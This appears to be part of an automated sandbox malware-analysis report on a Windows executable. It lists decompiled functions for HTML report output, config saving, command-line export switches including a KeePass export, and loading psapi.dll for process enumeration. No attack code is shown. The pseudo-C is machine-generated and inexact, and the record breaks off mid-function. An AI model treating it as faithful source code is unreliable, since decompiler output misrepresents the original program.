				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F071(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                  0x0040f126
                                                  0x0040f141
                                                  0x0040f147
                                                  0x0040f155
                                                  0x0040f15b
                                                  0x0040f160
                                                  0x0040f167
                                                  0x0040f16e
                                                  0x0040f175
                                                  0x0040f175
                                                  0x0040f17b
                                                  0x0040f17e
                                                  0x0040f180
                                                  0x0040f188
                                                  0x0040f18d
                                                  0x0040f194
                                                  0x0040f1a3
                                                  0x0040f1b0
                                                  0x0040f1b5
                                                  0x0040f1b5
                                                  0x0040f1b8
                                                  0x0040f1be
                                                  0x0040f1da
                                                  0x0040f1e7
                                                  0x0040f1ec
                                                  0x0040f1f5
                                                  0x0040f1fb
                                                  0x0040f1ff
                                                  0x0040f207
                                                  0x0040f20d
                                                  0x0040f212
                                                  0x0040f21c
                                                  0x0040f224
                                                  0x0040f22a
                                                  0x0040f22e
                                                  0x0040f236
                                                  0x0040f23c
                                                  0x0040f242

                                                  APIs
                                                  • memset.MSVCRT ref: 0040F147
                                                  • memset.MSVCRT ref: 0040F15B
                                                  • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F188
                                                  • sprintf.MSVCRT ref: 0040F1A3
                                                  • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F1B0
                                                  • sprintf.MSVCRT ref: 0040F1DA
                                                  • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F1E7
                                                  • strcat.MSVCRT(?,00413DF4,?,?,?,?,?), ref: 0040F1F5
                                                  • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F207
                                                  • strcat.MSVCRT(?,00409631,?,?,?,?,?), ref: 0040F212
                                                  • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F224
                                                  • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F236
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcat$memsetsprintf$strcpy
                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                  • API String ID: 1662040868-1996832678
                                                  • Opcode ID: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                  • Instruction ID: 418722c3eca89b157b40b8f143ba28d640e3e929850bbea17599129c1cdb8299
                                                  • Opcode Fuzzy Hash: 7011e04130d48b63dca1ce687a5e40637fab1df2285b26d08083567b97ca835c
                                                  • Instruction Fuzzy Hash: 3F31D5B2841615BAC720AB55ED82DCAB36C9F10364F6041BFF215B31C2DA7C9FC48B98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040AF17, Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040AF17(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x413bdc;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				 *((intOrPtr*)(_v540 + 4))("ShowGridLines", _t88 + 4, 0);
				 *((intOrPtr*)(_v540 + 8))("SaveFilterIndex", _t88 + 8, 0);
				 *((intOrPtr*)(_v540 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				 *((intOrPtr*)(_v540 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t83 =  &_v540;
				 *((intOrPtr*)(_v540 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401896(_t75);
				}
				return E00408671( *((intOrPtr*)(_t75 + 0x370)), _t83,  &_v540);
			}



















                                                  0x0040af29
                                                  0x0040af35
                                                  0x0040af3c
                                                  0x0040af4d
                                                  0x0040af5c
                                                  0x0040af65
                                                  0x0040af67
                                                  0x0040af67
                                                  0x0040af76
                                                  0x0040af7e
                                                  0x0040af92
                                                  0x0040af9c
                                                  0x0040afa3
                                                  0x0040afaa
                                                  0x0040afbb
                                                  0x0040afc0
                                                  0x0040afdf
                                                  0x0040aff8
                                                  0x0040b011
                                                  0x0040b02a
                                                  0x0040b02d
                                                  0x0040b037
                                                  0x0040b03a
                                                  0x0040b03b
                                                  0x0040b03d
                                                  0x0040b045
                                                  0x0040b047
                                                  0x0040b04f
                                                  0x0040b051
                                                  0x0040b051
                                                  0x0040b045
                                                  0x0040b06a
                                                  0x0040b070
                                                  0x0040b076
                                                  0x0040b078
                                                  0x0040b078
                                                  0x0040b092

                                                  APIs
                                                  • memset.MSVCRT ref: 0040AF3C
                                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040AF4D
                                                  • strrchr.MSVCRT ref: 0040AF5C
                                                  • strcat.MSVCRT(00000000,.cfg), ref: 0040AF76
                                                  • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040AFAA
                                                  • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040AFBB
                                                  • GetWindowPlacement.USER32(?,?), ref: 0040B051
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                  • String ID: .cfg$0@$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos
                                                  • API String ID: 1301239246-2014360536
                                                  • Opcode ID: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                  • Instruction ID: 2fe98fd5fda5e8878426aecce951da02ffd08f2862891724b98557ab80592e30
                                                  • Opcode Fuzzy Hash: eb541b8388b74fc04471e90b9f59632c9d2ea6da41be0549b214623736a651a6
                                                  • Instruction Fuzzy Hash: 3A413972940118ABCB61DB54CC88FDAB7BCEB58304F4441AAF509E7191DB74ABC5CBA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409482, Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 80%
                                                  			E00409482(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F071(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405EFD(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F071(_v28,  &_v184);
						E0040F09D( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F071(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F126( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405EFD(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405EFD(_a4, "</table><p>");
				return E00405EFD(_a4, 0x412b1c);
			}































                                                  0x00409482
                                                  0x0040949b
                                                  0x004094a2
                                                  0x004094a9
                                                  0x004094b5
                                                  0x004094b7
                                                  0x004094ba
                                                  0x004094c1
                                                  0x004094c5
                                                  0x004094d4
                                                  0x004094db
                                                  0x004094e7
                                                  0x004094eb
                                                  0x004094f2
                                                  0x004094f7
                                                  0x00409503
                                                  0x00409506
                                                  0x0040951f
                                                  0x00409524
                                                  0x00409524
                                                  0x0040952f
                                                  0x00409539
                                                  0x0040953c
                                                  0x00409546
                                                  0x0040954c
                                                  0x0040955b
                                                  0x00409566
                                                  0x0040956c
                                                  0x0040956f
                                                  0x00409573
                                                  0x00409577
                                                  0x0040957f
                                                  0x00409582
                                                  0x0040958d
                                                  0x0040959a
                                                  0x004095ae
                                                  0x004095bc
                                                  0x004095c3
                                                  0x004095c6
                                                  0x004095cc
                                                  0x00409601
                                                  0x004095ce
                                                  0x004095d1
                                                  0x004095e4
                                                  0x004095ed
                                                  0x004095f2
                                                  0x004095f2
                                                  0x00409608
                                                  0x0040960b
                                                  0x0040960f
                                                  0x0040961c
                                                  0x00409622
                                                  0x0040962c
                                                  0x00409650
                                                  0x0040965b
                                                  0x00409660
                                                  0x00409663
                                                  0x0040966c
                                                  0x00000000
                                                  0x00000000
                                                  0x00409544
                                                  0x00409544
                                                  0x00409546
                                                  0x00409672
                                                  0x0040967a
                                                  0x00409692

                                                  APIs
                                                  • memset.MSVCRT ref: 004094A2
                                                  • memset.MSVCRT ref: 004094C5
                                                  • memset.MSVCRT ref: 004094DB
                                                  • memset.MSVCRT ref: 004094EB
                                                  • sprintf.MSVCRT ref: 0040951F
                                                  • strcpy.MSVCRT(00000000, nowrap), ref: 00409566
                                                  • sprintf.MSVCRT ref: 004095ED
                                                  • strcat.MSVCRT(?,&nbsp;), ref: 0040961C
                                                    • Part of subcall function 0040F071: sprintf.MSVCRT ref: 0040F090
                                                  • strcpy.MSVCRT(?,?), ref: 00409601
                                                  • sprintf.MSVCRT ref: 00409650
                                                    • Part of subcall function 00405EFD: strlen.MSVCRT ref: 00405F0A
                                                    • Part of subcall function 00405EFD: WriteFile.KERNEL32(00412B1C,00000001,00000000,74B04DE0,00000000,?,?,004092ED,00000001,00412B1C,74B04DE0), ref: 00405F17
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                  • API String ID: 2822972341-601624466
                                                  • Opcode ID: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                  • Instruction ID: 52fdeb1f016046010361db54033fcb762b78bd0ac31642afda0bfecd98a661c0
                                                  • Opcode Fuzzy Hash: ca9a12e501fe1fbd997685680bd2bfae0b12254e9316b678fa6584ad6f8df2c7
                                                  • Instruction Fuzzy Hash: 2C619E32900218AFCF15EF59CC86EDE7B79EF04314F1005AAF905AB1E2DB399A85DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00409EC4, Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 58%
                                                  			E00409EC4(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x416b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x416b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049E7( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                  0x00409ec7
                                                  0x00409ed5
                                                  0x00409edf
                                                  0x00409ee5
                                                  0x00409ef1
                                                  0x00409ef6
                                                  0x00409efc
                                                  0x00409f11
                                                  0x00409f11
                                                  0x00409f1a
                                                  0x00409f26
                                                  0x00409f2b
                                                  0x00409f31
                                                  0x00409f46
                                                  0x00409f46
                                                  0x00409f52
                                                  0x00409f57
                                                  0x00409f5d
                                                  0x00409f93
                                                  0x00409f97
                                                  0x00409fa1
                                                  0x00409fa3
                                                  0x00409fa7
                                                  0x00409fb8
                                                  0x00409fc2
                                                  0x00409fcf
                                                  0x00409fdb
                                                  0x00409fde
                                                  0x0040a004

                                                  APIs
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409EF1
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409EFC
                                                  • SendMessageA.USER32(?,00001003,00000001,?), ref: 00409F11
                                                  • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 00409F26
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 00409F31
                                                  • SendMessageA.USER32(?,00001003,00000000,?), ref: 00409F46
                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 00409F52
                                                  • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 00409F5D
                                                  • LoadImageA.USER32 ref: 00409F7B
                                                  • LoadImageA.USER32 ref: 00409F97
                                                  • ImageList_SetImageCount.COMCTL32(?,00000000), ref: 00409FA3
                                                  • GetSysColor.USER32(0000000F), ref: 00409FA7
                                                  • ImageList_AddMasked.COMCTL32(?,?,00000000), ref: 00409FC2
                                                  • ImageList_AddMasked.COMCTL32(?,00000000,?), ref: 00409FCF
                                                  • DeleteObject.GDI32(?), ref: 00409FDB
                                                  • DeleteObject.GDI32(00000000), ref: 00409FDE
                                                  • SendMessageA.USER32(00000000,00001208,00000000,?), ref: 00409FFC
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Image$List_$Count$CreateMessageSend$DeleteLoadMaskedObject$Color
                                                  • String ID:
                                                  • API String ID: 3411798969-0
                                                  • Opcode ID: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                  • Instruction ID: 9f66d34d320d782a5b10da91aa20dc2822d11362667953dcc3c6c241c584b6d3
                                                  • Opcode Fuzzy Hash: 467695da83f3f8742914b6257f9d468e5ea1cf314c2a89caacd0f02629d38904
                                                  • Instruction Fuzzy Hash: E23150716803087FFA316B70DC47FD67B95EB48B00F114829F395AA1E1CAF279909B18
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040B841, Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 70COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 70%
                                                  			E0040B841(signed int __eax, void* __esi) {
				void* _t5;
				void* _t6;
				void* _t7;
				void* _t8;
				void* _t9;
				void* _t10;

				_push("/shtml");
				L004115B2();
				if(__eax != 0) {
					_push("/sverhtml");
					L004115B2();
					if(__eax != 0) {
						_push("/sxml");
						L004115B2();
						if(__eax != 0) {
							_push("/stab");
							L004115B2();
							if(__eax != 0) {
								_push("/scomma");
								L004115B2();
								if(__eax != 0) {
									_push("/stabular");
									L004115B2();
									if(__eax != 0) {
										_push("/skeepass");
										L004115C4();
										asm("sbb eax, eax");
										return ( ~__eax & 0xfffffff8) + 8;
									} else {
										_t5 = 3;
										return _t5;
									}
								} else {
									_t6 = 7;
									return _t6;
								}
							} else {
								_t7 = 2;
								return _t7;
							}
						} else {
							_t8 = 6;
							return _t8;
						}
					} else {
						_t9 = 5;
						return _t9;
					}
				} else {
					_t10 = 4;
					return _t10;
				}
			}









                                                  0x0040b842
                                                  0x0040b847
                                                  0x0040b850
                                                  0x0040b857
                                                  0x0040b85c
                                                  0x0040b865
                                                  0x0040b86c
                                                  0x0040b871
                                                  0x0040b87a
                                                  0x0040b881
                                                  0x0040b886
                                                  0x0040b88f
                                                  0x0040b896
                                                  0x0040b89b
                                                  0x0040b8a4
                                                  0x0040b8ab
                                                  0x0040b8b0
                                                  0x0040b8b9
                                                  0x0040b8c0
                                                  0x0040b8c5
                                                  0x0040b8cc
                                                  0x0040b8d6
                                                  0x0040b8bb
                                                  0x0040b8bd
                                                  0x0040b8be
                                                  0x0040b8be
                                                  0x0040b8a6
                                                  0x0040b8a8
                                                  0x0040b8a9
                                                  0x0040b8a9
                                                  0x0040b891
                                                  0x0040b893
                                                  0x0040b894
                                                  0x0040b894
                                                  0x0040b87c
                                                  0x0040b87e
                                                  0x0040b87f
                                                  0x0040b87f
                                                  0x0040b867
                                                  0x0040b869
                                                  0x0040b86a
                                                  0x0040b86a
                                                  0x0040b852
                                                  0x0040b854
                                                  0x0040b855
                                                  0x0040b855

                                                  APIs
                                                  • _stricmp.MSVCRT(/shtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B847
                                                  • _stricmp.MSVCRT(/sverhtml,00412466,0040B940,?,00000000,00000000,?,?,?,0040BAC6), ref: 0040B85C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: _stricmp
                                                  • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                  • API String ID: 2884411883-1959339147
                                                  • Opcode ID: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                  • Instruction ID: 4e6abd9895fa0fe71fc14c80fe1cf8958250247b4a97c707517fcc1bdd8d2f83
                                                  • Opcode Fuzzy Hash: 045e389345d67b823dfff1935a382fcf458878b8cd1f840f130b7354828c5bc8
                                                  • Instruction Fuzzy Hash: AD011A7328931038F82925662C17FC30A8ACBD1BBBF30856BF606E41E5EF5DA5C0506D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040F243, Relevance: 24.1, APIs: 10, Strings: 6, Instructions: 114stringCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 92%
                                                  			E0040F243(intOrPtr _a4, intOrPtr _a8, char _a12, char _a16, intOrPtr _a20) {
				void _v259;
				char _v260;
				void _v515;
				char _v516;
				void _v771;
				char _v772;
				void _v1027;
				char _v1028;
				char _v1284;
				char _v2308;
				char _t47;
				intOrPtr* _t50;
				void* _t57;
				intOrPtr* _t73;
				void* _t76;
				void* _t77;
				void* _t78;
				void* _t79;

				_v1028 = 0;
				memset( &_v1027, 0, 0xfe);
				_v772 = 0;
				memset( &_v771, 0, 0xfe);
				_v516 = 0;
				memset( &_v515, 0, 0xfe);
				_t77 = _t76 + 0x24;
				if(_a16 != 0xffffffff) {
					sprintf( &_v1028, " bgcolor=\"%s\"", E0040F071(_a16,  &_v1284));
					_t77 = _t77 + 0x14;
				}
				if(_a20 != 0xffffffff) {
					sprintf( &_v772, "<font color=\"%s\">", E0040F071(_a20,  &_v1284));
					strcpy( &_v516, "</font>");
					_t77 = _t77 + 0x1c;
				}
				sprintf( &_v2308, "<table border=\"1\" cellpadding=\"5\"><tr%s>\r\n",  &_v1028);
				E00405EFD(_a4,  &_v2308);
				_t47 = _a12;
				_t78 = _t77 + 0x14;
				if(_t47 > 0) {
					_t73 = _a8 + 4;
					_a16 = _t47;
					do {
						_v260 = 0;
						memset( &_v259, 0, 0xfe);
						_t50 =  *_t73;
						_t79 = _t78 + 0xc;
						if( *_t50 == 0) {
							_v260 = 0;
						} else {
							sprintf( &_v260, " width=\"%s\"", _t50);
							_t79 = _t79 + 0xc;
						}
						sprintf( &_v2308, "<th%s>%s%s%s\r\n",  &_v260,  &_v772,  *((intOrPtr*)(_t73 - 4)),  &_v516);
						_t57 = E00405EFD(_a4,  &_v2308);
						_t78 = _t79 + 0x20;
						_t73 = _t73 + 8;
						_t34 =  &_a16;
						 *_t34 = _a16 - 1;
					} while ( *_t34 != 0);
					return _t57;
				}
				return _t47;
			}





















                                                  0x0040f25e
                                                  0x0040f264
                                                  0x0040f272
                                                  0x0040f278
                                                  0x0040f286
                                                  0x0040f28c
                                                  0x0040f291
                                                  0x0040f298
                                                  0x0040f2b6
                                                  0x0040f2bb
                                                  0x0040f2bb
                                                  0x0040f2c2
                                                  0x0040f2e0
                                                  0x0040f2f1
                                                  0x0040f2f6
                                                  0x0040f2f6
                                                  0x0040f30c
                                                  0x0040f31b
                                                  0x0040f320
                                                  0x0040f323
                                                  0x0040f328
                                                  0x0040f332
                                                  0x0040f335
                                                  0x0040f338
                                                  0x0040f341
                                                  0x0040f347
                                                  0x0040f34c
                                                  0x0040f34e
                                                  0x0040f353
                                                  0x0040f36c
                                                  0x0040f355
                                                  0x0040f362
                                                  0x0040f367
                                                  0x0040f367
                                                  0x0040f396
                                                  0x0040f3a5
                                                  0x0040f3aa
                                                  0x0040f3ad
                                                  0x0040f3b0
                                                  0x0040f3b0
                                                  0x0040f3b0
                                                  0x00000000
                                                  0x0040f3b5
                                                  0x0040f3b9

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.240465103.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000002.00000002.240481478.0000000000418000.00000040.00000001.sdmp Download File
                                                  Yara matches
                                                  Similarity
                                                  • API ID: sprintf$memset$strcpy
                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                  • API String ID: 898937289-3842416460
                                                  • Opcode ID: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                  • Instruction ID: 9a5c5c5b7b50b61a4e5f96e5236d764a10b70f2cfe31ee2b12760fde8c14bfcc
                                                  • Opcode Fuzzy Hash: ecad5a273c195f4d907ec2c98c3fcd712bb439ffa37f8c8a1398ed03aac76e31
                                                  • Instruction Fuzzy Hash: C3415FB284021D7ADF21EB55DC41FEB776CAF44344F0401FBBA09A2152E6389F988FA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0040E0DA, Relevance: 22.8, APIs: 7, Strings: 6, Instructions: 48libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 100%
                                                  			E0040E0DA() {
				void* _t1;
				int _t2;
				struct HINSTANCE__* _t4;

				if( *0x417518 != 0) {
					return _t1;
				}
				_t2 = LoadLibraryA("psapi.dll");
				_t4 = _t2;
				if(_t4 == 0) {
					L10:
					return _t2;
				} else {
					_t2 = GetProcAddress(_t4, "GetModuleBaseNameA");
					 *0x416fec = _t2;
					if(_t2 != 0) {
						_t2 = GetProcAddress(_t4, "EnumProcessModules");
						 *0x416fe4 = _t2;
						if(_t2 != 0) {
							_t2 = GetProcAddress(_t4, "GetModuleFileNameExA");
							 *0x416fdc = _t2;
							if(_t2 != 0) {
								_t2 = GetProcAddress(_t4, "EnumProcesses");
								 *0x41710c = _t2;
								if(_t2 != 0) {
									_t2 = GetProcAddress(_t4, "GetModuleInformation");
									 *0x416fe8 = _t2;
									if(_t2 != 0) {
										 *0x417518 = 1;
									}
								}
							}
						}
					}
					if( *0x417518 == 0) {
						_t2 = FreeLibrary(_t4);
					}
					goto L10;
				}
			}






                                                  0x0040e0e1
                                                  0x0040e171
                                                  0x0040e171
                                                  0x0040e0ed
                                                  0x0040e0f3
                                                  0x0040e0f7
                                                  0x0040e170
                                                  0x00000000
                                                  0x0040e0f9
                                                  0x0040e106
                                                  0x0040e10a
                                                  0x0040e10f
                                                  0x0040e117
                                                  0x0040e11b
                                                  0x0040e120
                                                  0x0040e128
                                                  0x0040e12c
                                                  0x0040e131
                                                  0x0040e139
                                                  0x0040e13d
                                                  0x0040e142
                                                  0x0040e14a
                                                  0x0040e14e
                                                  0x0040e153
                                                  0x0040e155
                                                  0x0040e155
                                                  0x0040e153
                                                  0x0040e142
                                                  0x0040e131
                                                  0x0040e120
                                                  0x0040e167
                                                  0x0040e16a
                                                  0x0040e16a
                                                  0x00000000
                                                  0x0040e167

                                                  APIs
                                                  • LoadLibraryA.KERNEL32(psapi.dll,?,0040DD12), ref: 0040E0ED
                                                  • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameA), ref: 0040E106
